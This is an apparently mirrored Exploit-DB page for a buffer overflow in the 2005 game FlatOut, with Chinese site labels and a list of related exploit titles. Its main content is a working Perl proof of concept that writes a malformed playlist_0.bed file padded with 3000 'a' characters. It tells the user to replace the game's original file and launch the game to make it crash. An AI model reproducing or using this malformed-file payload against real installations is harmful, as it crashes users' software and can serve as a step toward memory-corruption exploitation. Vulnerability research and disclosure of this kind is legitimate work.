Bugbear FlatOut 2005 – ‘.bed’ File Buffer Overflow

Exploit Database
16 阅读

作者： Silent_Dream

日期： 2011-11-30
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/18173/

#Exploit Title: FlatOut Malformed .bed file Buffer Overflow
# Date: 11-29-11
# Author: Silent Dream
# Software Link: http://www.gog.com/en/gamecard/flatout
# Version: Latest
# Tested on: Windows 7

#Tested on GOG.com copy of FlatOut.Exception offset = 61616161
#Multiple .bed files are vulnerable to buffer overflows...too many to even begin to list..

my $file = "playlist_0.bed";
my $head = "Title	=	\"";
my $junk = "a" x 3000 . "\"\r";
my $tail = "Loop	= {" . "\r}";
open($File, ">$file");
print $File $head.$junk.$tail;
close($FILE);
print "Overwrite the original playlist_0.bed file in %program files%\\GOG.com\\FlatOut\\data\\music and launch flatout.exe...wait for the crash\r\n";

last Exploits
Bugbear FlatOut 2005 – ‘.bed’ File Buffer Overflow的更多信息

iCash 7.6.5 – Denial of Service (PoC)：
Sudo 1.8.25p – ‘pwfeedback’ Buffer Overflow (PoC)：
Google Chrome – ‘layout’ Out-of-Bounds Read：
Counter-Strike Global Offensive 1.37.1.1 – ‘vphysics.dll’ Denial of Service (PoC)：
Apple iPhone 3.1.2 – ‘7D11’ Model MB702LL Mobile Safari Denial of Service：
Mozilla Firefox < 50.1.0 - Use-After-Free：
Telegram 3.2 – Input Length Handling Crash (PoC)：
Microsoft Windows Kernel – Out-of-Bounds Read in CI!HashKComputeFirstPageHash While Parsing Malformed PE File：